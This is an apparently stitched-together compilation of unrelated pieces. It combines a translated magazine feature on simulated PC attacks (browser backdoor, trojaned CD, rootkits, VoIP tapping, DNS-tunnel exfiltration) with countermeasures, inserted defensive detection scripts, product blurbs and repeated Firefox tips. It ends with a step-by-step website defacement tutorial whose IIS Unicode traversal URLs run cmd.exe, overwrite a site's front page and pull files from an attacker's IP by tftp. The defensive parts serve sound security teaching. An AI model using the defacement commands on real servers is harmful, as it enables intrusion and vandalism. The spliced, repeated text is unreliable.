Sementara fungsi "Privacy" dalam menu "Tools | Options" tetap tersedia. Pada tab-tab "browsing History", "Saved Passwords", "Saved Form information", "Download History", "Cookies" dan "Cache" disediakan tombol-tombol untuk menghapus.
Namun, prosedur ini membutuhkan banyak klik. Jadi, bila Anda ingin menghapus semua data, metode "Clear Private Data" yang baru jauh lebih praktis.
telephone conversations can be done easily. With the simulated attacks below, you will better understand how hackers attack and how to counter them.
Have you protected your PC with a firewall, antivirus and service pack? If so, your PC is already safer from viruses and hackers. But a PC is not really safe until you have installed the latest patch, so do not be surprised if your PC receives an 'uninvited guest' one day. Even with the latest patch installed, there is no guarantee that your PC is 100% safe. With 0-day exploits (holes that are not yet known or patched), a hacker can get through a seemingly secure firewall in a matter of seconds. Armed with a modified CD, even the most secure firewall can be breached. The writing team tried this out and simulated the most dangerous attacks using the latest hacker methods, including rootkits. Several colleagues were chosen as targets for the simulated attacks.
The result is startling: if they want to, attackers can take over the victim's PC with ease. How does it work, and which preventive steps effectively protect your PC? Read on.
1. Spying on the Victim
Rule number one for a successful intruder or hacker is to know the enemy well. One effective way to get to know a victim is to learn how they behave when using a web browser. Since 90% of surfers still use Internet Explorer, the task is easier. More interesting still, many companies use the Microsoft programs that come pre-installed on the PC.
The hacker only needs to lure the victim to a website prepared for the purpose and exploit a weakness in the browser.
Attack: We planned to take control of the browser, in other words take over the PC, through a buffer overflow exploit. For that, the victim's software has to be identified. This can be done by luring the victim to an online address designed to identify the browser, which reveals the browser's name and version. The newer the patches installed on the browser, the smaller the chance of attacking it, which is why the victim's browser needs to be identified. Conveniently, the browser sends this identifying information itself, and it can be read afterwards from the web server's logs. The file version must also be known, since most buffer overflows only work with specific browser versions. We then found a versatile 0-day exploit in Internet Explorer 6. '0-day exploit' is the term for a brand-new security hole for which no patch exists yet.
We obtained additional information from the FrSIRT hackers who demonstrated the hole as a 'proof of concept'. They showed exactly where the hole could be exploited, which made launching an attack easier.
In the example, merely by launching the Windows calculator program we could slip a backdoor into its script. The backdoor then becomes the 'entrance' for other malicious tools into the system. The backdoor scripts needed are widely available on the Internet, so the attack can be carried out by simple copy and paste, just like a script kiddie. Now we had to get the victim to open the prepared website, so we sent an e-mail with a special link that the victim would find tempting to click. With this simple trick, the attack went through without a hitch. After the victim clicked the link, Internet Explorer opened and immediately crashed, a sign that the backdoor had been successfully installed on the victim's PC.
Countermeasure: Use an alternative browser such as Firefox or Opera. Security experts have found dangerous holes in those browsers too, but those holes are exploited less often; hackers usually prefer Internet Explorer because it is used more widely.
Caution: Never open links in e-mail carelessly. Treat e-mail from senders you do not know with great care.
2. Getting Through the Firewall
Deceiving and disguising perfectly matter to a spy. The same applies to a hacker who wants to slip a trojan onto a CD without raising anyone's suspicion, so that users have no idea what dangers threaten them. Few people know that a demo CD with an attractive splash screen and contents can carry a trojan.
Attack: This time we did not install a backdoor to bring in the trojan; we exploited the capacity of the medium and packed the trojan straight onto the CD. The tool chosen was the classic trojan 'Back Orifice 2000', because this open-source trojan is easy to modify: a little new code and a different compiler, and most antivirus programs no longer detect it. To have the trojan installed when the CD is inserted into the drive, we took an existing demo CD and built a setup routine with the free tool Nullsoft Scriptable Install System (NSIS). The difference is that this installation also includes a trojan. In addition, we gave the trojan an autorun function so that the installation starts automatically when the CD is inserted. The victim only has to insert the CD and the trojan gets to work. In the example, the trojan records every keystroke and reports it, which is useful for a hacker who wants to know the victim's habits and the confidential data on their PC.
Countermeasure: There is no perfect defence against an attack like this. Still, what applies to e-mail also applies to CDs: do not install programs you do not know. In practice that is hard to do. A better approach is to use a dedicated test PC that is not connected to the network, so a trojan cannot damage other PCs.
3. Becoming Invisible
The third tenet of espionage is to infiltrate while staying invisible. In PC espionage this means a rootkit is needed: a simple backdoor has to be turned into a super trojan. Once inside the system, such a trojan is hard to find and even harder to remove.
The best-known rootkit for Windows is the 'FU Rootkit'. It hides the malicious program from Task Manager, so the trojan can no longer be stopped. Modern rootkits such as 'Beast' hide even more: registry entries, TCP/IP connections and files on the hard disk.
Without special programs, even an advanced user cannot find such a trojan, let alone remove it, because the rootkit diverts Windows functions and manipulates the answers that ordinary antivirus software relies on (see the box Rootkit: The Invisible Danger).
Attack: We modified 'Back Orifice 2000' with a rootkit function from 'FU Rootkit'. This is as easy as integrating a plug-in into Photoshop: all that is needed is to install the rootkit plug-in and specify which files should later be invisible to the user. For the test we hid the trojan and all the files it creates, for example the keylogger's log file.
Countermeasure: Against stealth techniques like this there is almost nothing you can do. Once a trojan is installed on the system, it can only be removed with a special tool such as Rootkit Revealer from Sysinternals.
You also need to know your PC's system well to find such a trojan, since details like storage locations and Windows functions have to be properly understood. A dilemma arises with harmless programs such as Daemon Tools: this free tool for creating virtual drives unfortunately also uses rootkit-like techniques to integrate itself invisibly into the system.
ROOTKIT: THE INVISIBLE DANGER
How Hackers Fool Antivirus Software
Rootkits sit so deep inside the operating system that security programs usually cannot detect them. These sophisticated trojans are collections of tools that can log passwords, give a hacker access, record keyboard input or intercept information on the network, all without being seen.
Security specialist F-Secure has warned of the danger of rootkits, which still hold great potential for disguising viruses and worms. There is already a worm that uses Sony's rootkit method (see the box Protection with Hacker Methods).
Antivirus software often fails to detect a rootkit. Unlike ordinary malware, which works at user level, a rootkit hooks itself into the Windows API (Application Program Interface). Through the API, programs, including antivirus and firewall software, invoke basic operating-system functions such as access to the hard disk or registry.
The rootkit then intercepts every request and decides which data the security application is allowed to see. If a virus scanner looks for the rootkit's file names, those entries are filtered out of the answer the operating system gives, and the trojan is not found.
Finding a rootkit: Fortunately, most Windows rootkits are still imperfect. The 'Slanret' trojan, for example, is built as a system driver and is therefore visible in Windows Safe Mode; it also causes frequent crashes.
Other clues to the presence of a rootkit are hard disk space that shrinks drastically, CPU performance that drops sharply for no clear reason, and unknown Internet connections. Advanced PC users typically use the Rootkit Revealer tool to find out which APIs are being diverted. It can also compare the files on the hard disk with a 'clean' backup made earlier.
Removing a rootkit: The most drastic and most effective way to get rid of a rootkit or other hacker tool is to format the hard disk and install a fresh system.
As a preventive step, you should also change all your passwords. Special tools for tracking down and deleting rootkits, such as RootkitRevealer (http://www.sysinternals.com) or BlackLight (http://www.fsecure.com), are complicated and better suited to advanced PC users. Simple tools for removing particular rootkit variants, such as the rootkit in Sony's audio CD copy protection, are unfortunately not yet available. Rootkits have one thing in common with ordinary malware: a PC with a firewall and patched antivirus cannot be infected by them, provided the user does not carelessly open suspicious e-mail attachments or download files from unknown authors.
Info: http://www.rootkit.com
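The "compare the files on the hard disk with a clean backup" check mentioned in the box can be scripted. The Python below is an added example, not code from CHIP, Sysinternals or Rootkit Revealer: it builds a SHA-256 manifest of a directory tree, diffs it against a baseline taken earlier, and, for the cross-view idea behind Rootkit Revealer, lists names that a raw low-level listing reports but a high-level (possibly hooked) directory API omits. The directory layout and file names in demo() are constructed for the example.

```python
"""Baseline-and-diff integrity check, plus a cross-view listing comparison."""
import hashlib
import os
import tempfile


def build_manifest(root):
    """Map each regular file under root (path relative to root, '/' separated)
    to the SHA-256 of its contents."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            digest = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            manifest[rel] = digest.hexdigest()
    return manifest


def diff_manifests(baseline, current):
    """Files that appeared, vanished or changed since the clean baseline."""
    base_keys, cur_keys = set(baseline), set(current)
    return {
        "added": sorted(cur_keys - base_keys),
        "removed": sorted(base_keys - cur_keys),
        "changed": sorted(p for p in base_keys & cur_keys if baseline[p] != current[p]),
    }


def hidden_entries(api_listing, raw_listing):
    """Cross-view check in the spirit of Rootkit Revealer: names that a raw,
    low-level scan of the disk reports but the (possibly hooked) high-level
    directory API omits are exactly what a rootkit is hiding."""
    return sorted(set(raw_listing) - set(api_listing))


def demo():
    """Constructed scenario: take a baseline, then simulate a trojan patching a
    system file and dropping a new one; returns the resulting diff."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "system32"))
        with open(os.path.join(root, "system32", "sample.dll"), "wb") as fh:
            fh.write(b"original library bytes")
        with open(os.path.join(root, "readme.txt"), "wb") as fh:
            fh.write(b"unchanged")
        baseline = build_manifest(root)
        # the simulated infection: one file modified, one file added
        with open(os.path.join(root, "system32", "sample.dll"), "wb") as fh:
            fh.write(b"patched library bytes")
        with open(os.path.join(root, "system32", "dropped.sys"), "wb") as fh:
            fh.write(b"new driver")
        return diff_manifests(baseline, build_manifest(root))


if __name__ == "__main__":
    print(demo())
    print(hidden_entries(["a.txt", "b.txt"], ["a.txt", "b.txt", "hidden.sys"]))
```

The manifest is only trustworthy if the rootkit cannot filter what build_manifest() reads, so take the baseline and the later scan from clean boot media rather than from inside the running (possibly hooked) system; the box's advice to reinstall after a confirmed infection still stands.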
PROTECTION WITH HACKER METHODS
How Companies Use Hacker Tricks
Anyone who buys a Sony BMG audio CD, a Xerox printer or a game from Blizzard Entertainment does not expect sly hacker tricks. Unfortunately, what these big companies do is still a legal 'grey' zone.
- Audio CDs That Phone Home
To protect its music from piracy, Sony BMG uses an unusual copy protection. If you want to listen to the music on a Windows PC, you have to install a player contained on the CD. The problem is that something else is kept secret from the user: along with the player, a rootkit is installed that hides the copy-protection files from pirates. This only came to light after programmer Mark Russinovich of Sysinternals published it. The copy protection, called XCP, makes the operating system unstable and opens connections to the Internet.
To counter this, Blizzard reads the title bar of every active program and forwards it to the game server. The danger is that if an online-banking window is open at the time, its information is forwarded too.
- Hidden ID on Xerox Printers
Never print important or confidential documents on a Xerox colour printer: every printed sheet also carries a nearly invisible code. The finding was first published by the non-profit EFF (Electronic Frontier Foundation) in the US. The code contains the serial number and other IDs (date, time), so a printout can be traced to its origin even without the owner's name. The code, a few mm in size and made up of tiny yellow dots, can only be found if you know where to look, and then it has to be magnified 10x under a microscope.
Who benefits is unclear; speculation ranges from Xerox support to the US secret services. After EFF published the information, Xerox immediately held a press conference, arguing that the method is used to prevent document forgery.
4. Tapping Telephones
Hear everything and tell nothing is the fourth rule. Tapping telephone conversations has long ceased to be a privilege of secret services. If a few years ago the many holes in ISDN installations attracted hackers, the target has now shifted to tapping VoIP calls on the Internet.
Attack: For the demo we ran the 'Cain & Abel' tool, available on the Internet. It offers not only the usual hacking functions such as cracking passwords, but also lets you log the most frequently visited websites and record telephone conversations as WAV files. The only requirement is that the hacker is connected to the path that all the data travels along.
This is done through a (W)LAN connection or a trojan on one victim's PC. We started with a 'man-in-the-middle' attack and intercepted the victim's data stream. For that, the trojan had to be instructed to send its data to CHIP first. Once intercepted (tapped), the data was passed straight on to the intended PC. The victims (sender and receiver) noticed nothing of the tap.
Countermeasure: The easiest immediate step is to secure the LAN with MAC address filtering and to install antivirus software against trojans. There are now also solutions for encrypting VoIP calls, such as the Zfone tool from PGP inventor Phil Zimmermann.
The only problem is compatibility: not every provider supports every version of Zfone, so users lose their privacy.
5. Sending Data Out
The last and most important rule is not to get caught while spying.
Installing a trojan is only half the journey: without a connection back, even the most sophisticated trojan is useless. Since the victim's network infrastructure is not known in detail, we had to be prepared for all kinds of firewalls, above all desktop firewalls that can block any running program, and an IDS (Intrusion Detection System) that analyses the content of every packet. It is therefore not enough just to send data out of the PC; the information also has to be well disguised so that it does not stand out to security programs.
'Back Orifice 2000' offers hardly any suitable free plug-ins for this purpose. The only one, the 'SCTP' plug-in, does encrypt data well, leaving no recognisable pattern, but the method still bears the hallmarks of trojan communication. For a skilled hacker equipped with adequate data-smuggling methods, though, the firewall can be breached.
Attack: The most popular way is to use a protocol that looks harmless, such as HTTP, SMTP or DNS. We chose the DNS tunnel method in order to pass every security check on the network without raising suspicion: the information is packed into inconspicuous Domain Name packets. More than 90% of firewalls do not block this kind of packet, because the DNS protocol is essential for establishing Internet connections. We encrypted the small amount of information and sent as few packets as possible so that the IDS would not notice.
An excessive exchange of Domain Name packets would be suspicious and would be picked up by the IDS.
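The article's own observation, that a DNS tunnel stands out by its volume and by the odd-looking names it has to query, is exactly what an IDS rule keys on. The Python below is an added example and not code from CHIP or from any IDS product: it reads a constructed resolver log, groups queries by client and registered domain, and flags the pairs that combine many queries with long, high-entropy labels (the encoded payload). The log format, the thresholds and the assumption that the registered domain is the last two labels are all simplifications for the example.

```python
"""Score DNS query logs for tunnelling: many queries per client to one domain,
carrying long labels whose characters look like encoded data."""
import math
import re
from collections import defaultdict

# Constructed resolver log: timestamp client qtype qname.
# 192.168.0.12 browses normally; 192.168.0.34 pushes hex blobs through TXT lookups.
SAMPLE_LOG = """\
2006-03-01T10:00:01 192.168.0.12 A www.example.com
2006-03-01T10:00:02 192.168.0.12 A mail.example.com
2006-03-01T10:00:03 192.168.0.12 AAAA www.example.com
2006-03-01T10:00:05 192.168.0.34 TXT 7a3f9c1e4b2d8a6f5e0c9b7d3a1f2e4c.tun.example.net
2006-03-01T10:00:05 192.168.0.34 TXT 1b4e6d8a9c0f2e3d5a7b8c9d0e1f2a3b.tun.example.net
2006-03-01T10:00:06 192.168.0.34 TXT 9f8e7d6c5b4a3f2e1d0c9b8a7f6e5d4c.tun.example.net
2006-03-01T10:00:06 192.168.0.34 TXT 0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d.tun.example.net
2006-03-01T10:00:07 192.168.0.34 TXT c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8.tun.example.net
"""

LINE_RE = re.compile(r"^(\S+)\s+(\d+\.\d+\.\d+\.\d+)\s+(\w+)\s+(\S+)$")


def shannon_entropy(text):
    """Bits per character. Dictionary words score roughly 2-3, hex or base32
    payloads roughly 3.5-5."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname):
    """Return (subdomain labels, registered domain). Assumes the registered
    domain is the last two labels; a real deployment would use a public-suffix list."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) < 3:
        return [], ".".join(labels)
    return labels[:-2], ".".join(labels[-2:])


def parse_log(text):
    for line in text.splitlines():
        match = LINE_RE.match(line.strip())
        if match:
            yield match.groups()


def find_tunnel_candidates(log_text, min_queries=3, min_entropy=3.5, long_label=20):
    """Return {(client, domain): stats} for pairs that look like a tunnel:
    at least min_queries lookups whose subdomain part is both long and high-entropy."""
    stats = defaultdict(lambda: {"count": 0, "entropy_sum": 0.0, "max_label": 0})
    for _ts, client, _qtype, qname in parse_log(log_text):
        subs, domain = split_name(qname)
        entry = stats[(client, domain)]
        entry["count"] += 1
        entry["entropy_sum"] += shannon_entropy("".join(subs))
        entry["max_label"] = max(entry["max_label"], max((len(s) for s in subs), default=0))
    alerts = {}
    for key, entry in stats.items():
        avg_entropy = entry["entropy_sum"] / entry["count"]
        if (entry["count"] >= min_queries and avg_entropy >= min_entropy
                and entry["max_label"] >= long_label):
            alerts[key] = {"count": entry["count"], "avg_entropy": round(avg_entropy, 2),
                           "max_label": entry["max_label"]}
    return alerts


if __name__ == "__main__":
    for (client, domain), info in find_tunnel_candidates(SAMPLE_LOG).items():
        print(f"{client} -> {domain}: {info}")
```

The three thresholds are deliberately conservative so that CDN and anti-spam lookups with long but low-entropy labels do not fire; in practice the query count per minute and the share of TXT/NULL records are the next features worth adding.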
To get past desktop firewall protection we used an injection attack: we picked a program guaranteed not to be blocked by the firewall, namely the default browser, whether Internet Explorer or Firefox. You can easily find out which one it is from the Windows registry, read with a special trojan. Then we only had to wait until the unsuspecting victim started the program and loaded it into memory (RAM). At that moment the trojan hooks itself into the right process and uses it for its own ends.
To see whether the data smuggling worked, we ordered the trojan to send out a Word document belonging to the victim, unnoticed by its owner and by the firewall, of course.
Countermeasure: The contest between security companies and hackers looks like a 'vicious circle'. Firewalls, antivirus and IDS keep getting better at detecting and blocking attacks, but hacker attacks keep getting more sophisticated. The better a hacker knows the target, the harder he is to identify. The problem is that for every protection mechanism there is usually a trick to get around it. It is therefore vital that an administrator keeps the PC and its security programs up to date.
http://www.rootkit.com: The most popular website on the subject of rootkits. There you will find plenty of rootkit news and technical information.
http://www.bo2k.com: Website of the remote network administration tool developed from the classic Back Orifice trojan.
http://www.securityfocus.com: This website provides the latest PC security news and detailed expert analysis.
Hacker Tools
Anticipate hacker attacks by knowing how they work. These are tools you can use to secure your network.
Nmap: With this port scanner, all open ports and IP addresses on the network can be found, so that security holes can be closed.
Tip: To check every PC and port on your network, type the following command:
nmap -v -sS -O 192.168.*.*
If a port that hackers frequently target is open, close it immediately to avoid attacks.
SwitchSniffer: A PC connected to a switch on the network only receives the packets addressed to it. With this tool you can 'divert' those packets.
Tip: To protect yourself from tools like SwitchSniffer, use the following command line:
arp -s 192.168.0.1 00-aa-00-62-c6-09
The command above fixes definitively which MAC address belongs to a given IP address. The example uses the address of a router (the gateway to the Internet), which is often the one diverted.
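A pinned entry like the one above is only useful if you also notice when the cache disagrees with it. The Python below is an added example, not code from CHIP or from any of the tools named here: it parses a constructed 'arp -a' snapshot in the Windows layout, compares the entries you have pinned (here the router from the tip) with what the cache actually holds, and flags one MAC address that claims several IP addresses, the tell-tale sign of a diverting PC answering for both the router and its victims. The two snapshots and the MAC addresses are constructed; only the router binding is the one from the tip.

```python
"""Compare an ARP cache snapshot against pinned bindings and flag poisoning signs."""
import re

# Rows look like "  192.168.0.1           00-aa-00-62-c6-09     static"
ARP_ROW = re.compile(
    r"^\s*(\d+\.\d+\.\d+\.\d+)\s+([0-9a-fA-F]{2}(?:-[0-9a-fA-F]{2}){5})\s+(\w+)"
)

# The binding pinned with: arp -s 192.168.0.1 00-aa-00-62-c6-09
PINNED = {"192.168.0.1": "00-aa-00-62-c6-09"}

# Constructed 'arp -a' output of a healthy cache.
CLEAN_TABLE = """\
Interface: 192.168.0.10 --- 0x2
  Internet Address      Physical Address      Type
  192.168.0.1           00-aa-00-62-c6-09     static
  192.168.0.20          00-11-22-33-44-55     dynamic
  192.168.0.255         ff-ff-ff-ff-ff-ff     static
"""

# Constructed snapshot after a diverting PC (00-11-22-33-44-55) answered for the router.
POISONED_TABLE = """\
Interface: 192.168.0.10 --- 0x2
  Internet Address      Physical Address      Type
  192.168.0.1           00-11-22-33-44-55     dynamic
  192.168.0.20          00-11-22-33-44-55     dynamic
  192.168.0.255         ff-ff-ff-ff-ff-ff     static
"""


def parse_arp_table(text):
    """Map IP -> (mac, type) for every entry row; header lines are skipped."""
    entries = {}
    for line in text.splitlines():
        match = ARP_ROW.match(line)
        if match:
            ip, mac, kind = match.groups()
            entries[ip] = (mac.lower(), kind.lower())
    return entries


def check_arp_table(text, pinned):
    """Return a list of human-readable findings; an empty list means the cache
    agrees with the pinned bindings and no MAC claims more than one IP."""
    table = parse_arp_table(text)
    findings = []
    for ip, mac in pinned.items():
        seen = table.get(ip)
        if seen is None:
            findings.append(f"{ip}: no ARP entry at all")
        elif seen[0] != mac.lower():
            findings.append(f"{ip}: expected {mac.lower()} but cache holds {seen[0]} ({seen[1]})")
    by_mac = {}
    for ip, (mac, _kind) in table.items():
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in by_mac.items():
        # the broadcast address legitimately maps to ff-ff-ff-ff-ff-ff; skip it
        if len(ips) > 1 and mac != "ff-ff-ff-ff-ff-ff":
            findings.append(f"{mac} claims several IPs: {', '.join(sorted(ips))}")
    return findings


if __name__ == "__main__":
    print("clean:", check_arp_table(CLEAN_TABLE, PINNED))
    print("poisoned:", check_arp_table(POISONED_TABLE, PINNED))
```

Feed it the real output of arp -a from a scheduled task; entries added with arp -s do not survive a reboot on Windows, so the "no ARP entry" and "expected ... but cache holds" findings also catch a pin that silently disappeared.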
Ethereal: SwitchSniffer diverts data but cannot display it. With this tool you can.
Tip: To keep your data from going to the 'wrong address', use an encrypted connection such as HTTPS or SSH where needed.
Netcat: With this command-line tool you can build an unprotected connection or copy files across the network with ease, for example to simulate a server.
Tip: With a single line, this tool can provide web-server functionality. Create your own index.html and start the server with the following entry:
netcat -l -p 80 < index.html
Type 'http://127.0.0.1/' in the address bar to access it. The browser's simple requests can be read in the server window.
ALL-IN-ONE SECRETMAKER 4.2.7 - freeware
http://www.secretmaker.com
Complete, practical, powerful, free: the many security packages on the market today make it hard to pick the best one. All-in-One Secretmaker 4.2.7 solves that problem.
The software offers a number of main tools such as Security Watchdog, Intruder Blocker, Spam Fighter, Pop-up Blocker, Banner Blocker, Movie Blocker, Privacy Protector, History Cleaner, Worm Hunter, Cookie Eraser and more. Security Watchdog guards the computer against intruders. Intruder Blocker protects it from spyware, trackware and viruses. Spam Fighter cleans out spam and also works with POP3 e-mail clients. Banner Blocker reduces the advertisements shown while you surf. Movie Blocker fends off the Flash advertisements that slow down your surfing. Pop-up Blocker stops unwanted pop-ups. Privacy Protector hides your identity while surfing. Finally, Cookie Eraser and History Cleaner delete the cookies and traces left behind after you surf the web.
Can HDTV be recorded? It turns out HDTV has already been cracked!
The film industry wants to equip every HDTV format with HDCP copy protection, so that HDTV broadcasts can only be watched, not recorded. But this blockade has been broken by a Korean mini box called 'DVIHDCP'.
It converts the protected signal to VGA, which can be recorded without trouble. The mini box was actually not designed for piracy but for showing HDTV through a beamer/projector.
The Firefox developers have integrated a function for removing the traces that remain in Firefox after surfing. Open "Tools | Clear private data" and, under "Clear the following items now", tick each type of data to be deleted, such as "Cookies" and "Cache". Then just press the "Clear private data now" button.
The "Privacy" function in the "Tools | Options" menu is still available. The "Browsing History", "Saved Passwords", "Saved Form Information", "Download History", "Cookies" and "Cache" tabs each provide a delete button.
That procedure takes many clicks, though, so if you want to delete all data, the new "Clear Private Data" method is far more practical.
Deface Tutorial
Deface tutorial ...
1. We must pick the target website: http://www.target.loe, example -->> http://www.target.com
2. Login
This is a directory that exists on the website.
The directory is configured with a certain script so that the files on the site link together. If there is a bug in that script, we can break into the site.
Some examples of logins:
a) /_vti_bin
b) /_vti_cnf
c) /cgi-bin
d) /scripts
e) /msadc
3. Unicode --->> the code that can read the website's configuration script; this is the code that reads its CGI bug.
The coding can be repeated 1-3 times depending on the target we are going to hack:
a) ..%c1%1c..
b) ..%c0%9v..
c) ..%c0%af..
d) ..%c0%qf..
e) ..%c1%8s..
f) ..%e0%80%af..
g) ..%c1%9c..
h) ..%c1%pc..
4. Target OS -->> this states the web OS certificate; ours are WinNT and Win98
0xB5 ISO 8859-1
0xC5 ISO 8859-1
0xEA CP437
0x2140 JIS X 0208
0x22 ISO 8859-1
5. How It Works
Broadly, this deface is done in three ways:
A.) Defacing a website with the echo command
a.) In general: http://target/login/unicode/os/system/c+dir or http://www.target.com/login/unicode/os/system/c+dir
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+dir+c:
If the bug is present, our browser's title bar shows the words CGI Error, and we have broken into the website.
What we then see in the browser is a listing of the contents of the web server's hard disk, just like the dir command run at the DOS prompt:
Directory of c:
10/05/2001 19:56 Programs Files
10/05/2001 19:56 Inetpub
08/05/2001 10:23 230 cmd.exe
24/04/2001 04:33 4.620 1home.htm
05/10/2000 12:40 668 about.htm
10/05/2001 19:54 AboutUs
11/05/2001 10:28 131 about_us.htm
28/10/2000 14:49 4.911 about_us.old.htm
b.) After successfully viewing the disk listing, we have to find the site's Path_Translated by changing the command /c+dir+c: to /c+set:
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+dir+c: becomes http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+set
A CGI error comes out whose contents state the web server's batch system configuration. All sorts of things appear; the only one to look at is:
Path_Translated=d:\inetpub\wwwroot
c.) The next step is to copy the file cmd.exe under a new name, cmd1.exe or your own name, for example Jangkrik.exe, by changing
/c+dir+c: to /c+copy+c:
and adding: winntsystem32cmd.exe+c:jangkrik.exe
so we get:
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+copy+c%3Awinntsystem32cmd.exe+c%3Ajangkrik.exe
Now you can see the file cmd1.exe is already in the directory:
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c:
The real purpose of this is to shorten the command in our IE address bar.
d.) Find the index page at http://www.target.com/blah.ida
Sometimes the unknown .ida extension responds with the local path.
If the .ida trick does not work, try the InetPub directory:
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c%3Ainetpub
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c%3Ainetpubwwwroot
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c%3Ainetpubwwwrootindex.htm
This step is not really necessary, but there is no harm in doing it to be safe; with step b.) we already know where index.htm is, in other words the web folder.
e.) If you consider yourself a hacker, back up the site's front page first, because a hacker's job is to warn, not to destroy. Only amateurs, in other words vandals, wreck things without backing up index.htm. Otherwise we write to a new file name, like this:
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+copy+c%3Ainetpubwwwrootindex.htm+c%3Ainetpubwwwrootindex.htm.bak
f.) Only then do we deface, or echo, the front page with the command below:
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+echo+You+Were+Hacked+>+c:inetpubwwwrootindex.htm
To avoid damaging the site we write to a new file name:
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+echo+You+Were+Hacked+>+c:inetpubwwwrootjangkrik.htm
/c+echo+You%20Were%20Hacked+>+c: >>> writes the words You Were Hacked to
c:inetpubwwwrootindex.htm (the file written) or c:inetpubwwwrootjangkrik.htm (the file written)
For those who already understand HTML, if you want the deface to look cool use this command:
/c+echo"
This Web Site Hacking BY ....:::J.A.N.G.K.|.K:...
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda
"+>+c:inepubwwwrootindex.htm
/c+echo"
This Web Site Hacking BY ....:::J.A.N.G.K.|.K:...
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda
"+>+c:inepubwwwrootjangkrik.htm
Notes:
%3d stands for the = sign
%22 stands for the " sign
%23 stands for the # sign
If you understand HTML you can do whatever you like with your deface. To make the deface look good, put Flash in as well.
g.) The last step, to see the result, is to read the other file with the 'type' command:
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+type+c%3Ainetpubwwwrootindex.htm
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+type+c%3Ainetpubwwwrootjangkrik.htm
Or just look directly at http://www.target.com/ or http://www.target.com/jangkrik.htm
If you find that the web server answers access denied (writing refused) when you write, then the second way is with tftp:
B.) Defacing a website with tftp
The deface is done by uploading a file via TFTP32.
To support tftp, first download the software from http://www.download.com/ using the keyword TFTP32.
You work on the server's machine (as a plain user it definitely won't work).
Uploading a file via TFTP32: you don't need to copy cmd.exe, just go straight ahead.
Let's start uploading; the commands follow these steps:
a.) Do step a.) of (A.), the deface with echo, to find the vulnerability or CGI bug,
so that we get the hole, i.e. the script http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/
The next step is the upload itself. But first prepare the htm/html file of your deface page (get creative here).
Once everything is ready, upload with the command http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(your IP)+get+antique.htm(the file you want to upload)+ C:InetPubwwwrootmain.html
b.) Look again at what happens in our IE:
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :
Wow, congratulations, you have uploaded your file using the TFTP32 software; now open the target website.
The drawback of uploading via TFTP32 is that sometimes a server (website) refuses to accept our uploaded file. If that happens, use the first method above.
C.) Via ftp from our own site, which we have filled with our deface material
The first step is to create a free domain on a free web server. On that site we drop our deface page, or a backdoor, virus or other destructive program.
Next we do the same as step a.) of (A.); once you know the CGI bug hole or the unicode, do the following:
a.) After we find the vulnerability:
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:
Directory of c:
10/05/2001 19:56
Programs Files
10/05/2001 19:56
Inetpub
08/05/2001 10:23 230 cmd.exe
24/04/2001 04:33 4.620 1home.htm
05/10/2000 12:40 668 about.htm
10/05/2001 19:54
AboutUs
11/05/2001 10:28 131 about_us.htm
28/10/2000 14:49 4.911 about_us.old.htm
b.) Lalu kita lakukan langkah copy sesuai di langkah b.)(A.) ---->>tujuan nya memendekkan command unicode nya
c.) Lalu Kita Liat +set nya untuk melihat patch translade nya
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+set
Kira Nya path nya di c:inetpubwwwroot
d.)Langkah Selanjutnya Yaitu kita membuat script ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+open+geocities.com+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+jangkrik+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+anuamakang+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+ascii+>>+c:inetpubwwwrootjangkrik.ftp
